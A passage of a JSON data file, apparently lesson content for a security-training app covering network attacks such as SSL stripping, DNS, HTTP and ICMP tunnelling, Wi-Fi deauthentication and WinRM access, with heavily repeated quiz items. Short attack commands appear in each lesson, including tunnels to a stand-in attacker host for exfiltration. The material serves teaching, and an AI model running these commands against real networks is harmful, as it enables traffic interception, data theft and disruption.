uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"ssl-strip","cat":"Network Attacks","title":"SSL Stripping","diff":2,"xp":150,"intro":"Downgrade HTTPS to HTTP.","sections":[{"type":"text","content":"Downgrade HTTPS to HTTP."},{"type":"code","lang":"bash","content":"sudo bettercap -iface eth0\nset http.proxy.sslstrip true\nhttp.proxy on"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"SSL strip does?","opts":["Breaks encryption","Downgrades HTTPS to HTTP","Speeds up","Blocks HTTPS"],"ans":1},{"type":"quiz","q":"A SYN flood targets which resource?","opts":["Disk space","Connection table (half-open connections)","CPU","RAM"],"ans":1},{"type":"quiz","q":"ARP operates at which OSI layer?","opts":["Layer 3","Layer 4","Layer 2","Layer 7"],"ans":2},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"dns-tun","cat":"Network Attacks","title":"DNS Tunneling","diff":3,"xp":200,"intro":"Exfiltrate via DNS.","sections":[{"type":"text","content":"Exfiltrate via DNS."},{"type":"code","lang":"bash","content":"iodined -f 10.0.0.1 tunnel.attacker.com # server\niodine -f tunnel.attacker.com # client"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Why hard to detect?","opts":["Encrypted","DNS usually allowed through firewalls","Fast","UDP"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"http-tun","cat":"Network Attacks","title":"HTTP Tunneling","diff":2,"xp":125,"intro":"Tunnel through HTTP.","sections":[{"type":"text","content":"Tunnel through HTTP."},{"type":"code","lang":"bash","content":"chisel server -p 8080 --reverse\nchisel client attacker:8080 R:socks"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Why does HTTP tunnel bypass FWs?","opts":["Encryption","Port 80/443 always allowed","Speed","Compression"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"icmp-tun","cat":"Network Attacks","title":"ICMP Tunneling","diff":3,"xp":200,"intro":"Hide data in ICMP.","sections":[{"type":"text","content":"Hide data in ICMP."},{"type":"code","lang":"bash","content":"sudo ptunnel -p server -lp 8000 -da target -dp 22"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Why stealthy?","opts":["Speed","ICMP rarely blocked or inspected","Encryption","Small packets"],"ans":1},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"wifi-deauth","cat":"Network Attacks","title":"WiFi Deauth Attack","diff":1,"xp":100,"intro":"Force clients off network.","sections":[{"type":"text","content":"Force clients off network."},{"type":"code","lang":"bash","content":"sudo aireplay-ng -0 10 -a BSSID wlan0mon"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Deauth frame type?","opts":["Data","Management","Control","Beacon"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"rogue-ap","cat":"Network Attacks","title":"Rogue Access Point","diff":2,"xp":150,"intro":"Deploy rogue AP.","sections":[{"type":"text","content":"Deploy rogue AP."},{"type":"code","lang":"bash","content":"# hostapd-mana with captive portal\n# KARMA responds to all probes"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"KARMA attack?","opts":["DoS","Responds to ALL probe requests","Cracking","SQLi"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"smb-enum","cat":"Network Attacks","title":"SMB Enum & Attacks","diff":1,"xp":100,"intro":"Enumerate SMB shares.","sections":[{"type":"text","content":"Enumerate SMB shares."},{"type":"code","lang":"bash","content":"smbclient -L //target -N\nenum4linux -a target"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"enum4linux enumerates?","opts":["Web dirs","SMB shares, users, groups","DNS","Emails"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"ldap-enum","cat":"Network Attacks","title":"LDAP Enumeration","diff":2,"xp":125,"intro":"Extract AD objects.","sections":[{"type":"text","content":"Extract AD objects."},{"type":"code","lang":"bash","content":"ldapsearch -x -H ldap://DC -b 'dc=domain,dc=local'"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"LDAP reveals in AD?","opts":["FW rules","Users, groups, computers","Topology","Web apps"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"winrm-atk","cat":"Network Attacks","title":"WinRM Exploitation","diff":2,"xp":125,"intro":"Remote commands via WinRM.","sections":[{"type":"text","content":"Remote commands via WinRM."},{"type":"code","lang":"bash","content":"evil-winrm -i target -u admin -p password"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"WinRM port?","opts":["22","5985/5986","3389","445"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File 